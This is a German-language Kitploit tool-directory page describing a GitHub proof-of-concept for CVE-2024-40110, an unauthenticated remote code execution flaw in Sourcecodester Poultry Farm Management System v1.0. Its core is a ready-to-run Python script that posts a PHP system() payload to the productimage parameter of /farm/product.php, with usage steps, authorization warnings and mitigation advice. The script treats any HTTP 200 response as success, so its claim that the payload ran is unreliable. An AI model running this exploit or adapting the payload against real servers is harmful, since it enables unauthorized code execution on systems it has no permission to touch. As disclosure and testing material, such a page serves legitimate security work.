Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-40110 — Proof-of-Concept-Skript, das eine nicht authentifizierte Remote-Codeausführung im Sourcecodester Poultry Farm Management System über den anfälligen productimage-Parameter demonstriert. | Kitploit
Tools/GitHubGitHub/abdurahmon3236/cve-2024-40110
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubabdurahmon3236/cve-2024-40110

CVE-2024-40110

Proof-of-Concept-Skript, das eine nicht authentifizierte Remote-Codeausführung im Sourcecodester Poultry Farm Management System über den anfälligen productimage-Parameter demonstriert.

Repository anzeigen
2vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Proof of Concept (PoC) für nicht authentifizierte Remote-Code-Ausführung in Sourcecodester Poultry Farm Management System v1.0

Dieses Repository enthält ein Proof-of-Concept-Skript (PoC), das eine nicht authentifizierte Remote-Code-Ausführung (RCE) Sicherheitslücke in Sourcecodester Poultry Farm Management System v1.0 demonstriert. Die Sicherheitslücke existiert im Parameter productimage unter /farm/product.php, was es einem Angreifer ermöglicht, beliebigen Code auf dem Server auszuführen.

Inhaltsverzeichnis

  • Beschreibung der Sicherheitslücke
  • Einrichtung und Verwendung
    • PoC-Skript
  • Wichtige Hinweise
  • Abhilfemaßnahmen

Beschreibung der Sicherheitslücke

CVE-ID: (Ausstehend)

Überblick: Sourcecodester Poultry Farm Management System v1.0 enthält eine nicht authentifizierte Remote-Code-Ausführung (RCE) Sicherheitslücke über den Parameter unter . Diese Sicherheitslücke ermöglicht es einem Angreifer, ohne Authentifizierung beliebigen Code auf dem Server auszuführen.

productimage
/farm/product.php

Betroffene Version:

  • Sourcecodester Poultry Farm Management System v1.0

Einrichtung und Verwendung

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek (pip install requests)

PoC-Skript

Dieses Skript zeigt, wie ein Angreifer die RCE-Sicherheitslücke ausnutzen kann, indem er eine bösartige Anfrage an den anfälligen Parameter sendet.

Speichern Sie das folgende Skript als rce_poc.py und führen Sie es aus.

root@kitploit:~
import requests

# Configuration
target_url = "http://target-url/farm/product.php"  # Change this to the target URL

# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"

# Construct the malicious request
data = {
    'productimage': payload  # The vulnerable parameter
}

def exploit_rce(url, data):
    """
    Exploit the RCE vulnerability by sending a malicious request to the target URL.

    Args:
        url (str): The target URL.
        data (dict): The data to be sent in the POST request.
    """
    try:
        response = requests.post(url, data=data)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully executed the payload.")
        else:
            print("[-] Failed to execute the payload.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Sending malicious request to: {target_url}")
    exploit_rce(target_url, data)

Erklärung

  1. Konfiguration: Setzen Sie die target_url auf die URL des /farm/product.php-Endpunkts des anfälligen Servers.
  2. Payload: Der Payload ist ein einfacher PHP-Befehl zur Ausführung. Sie können den Payload nach Bedarf ändern, um verschiedene Befehle auszuführen.
  3. Anfrage erstellen: Das Skript erstellt eine POST-Anfrage mit dem bösartigen Payload im Parameter productimage.
  4. Exploit-Funktion: Die Funktion exploit_rce() sendet die bösartige Anfrage an die Ziel-URL und gibt die Antwortdetails aus.
  5. Skript ausführen: Bei der Ausführung wird das Skript versuchen, die RCE-Sicherheitslücke auszunutzen und die Ergebnisse auszugeben.

Wichtige Hinweise

  • Berechtigungen: Stellen Sie sicher, dass Sie die ausdrückliche Erlaubnis haben, diese Sicherheitslücke auf dem Zielsystem zu testen. Nicht autorisierte Tests sind illegal und unethisch.
  • Testumgebung: Führen Sie diesen Test in einer kontrollierten Umgebung durch, um Auswirkungen auf Produktionssysteme zu vermeiden.
  • Payload-Anpassung: Passen Sie den Payload nach Bedarf an, um die gewünschte Befehlsausführung zu erreichen.

Abhilfemaßnahmen

Um diese Sicherheitslücke zu beheben, wenden Sie die folgenden Schritte an:

  • Eingabevalidierung: Implementieren Sie eine ordnungsgemäße Eingabevalidierung, um Benutzereingaben zu bereinigen.
  • Datei-Upload-Beschränkungen: Beschränken Sie Datei-Uploads auf bestimmte Dateitypen und erzwingen Sie Größenbeschränkungen.
  • Software aktualisieren: Aktualisieren Sie Ihre Software regelmäßig auf die neueste Version, um Sicherheitspatches und Fehlerbehebungen anzuwenden.

Durch die Befolgung dieser Abhilfeschritte und Sicherheitsempfehlungen können Sie Sicherheitslücken wie dieses RCE-Problem in Sourcecodester Poultry Farm Management System v1.0 verhindern.

Tool herunterladen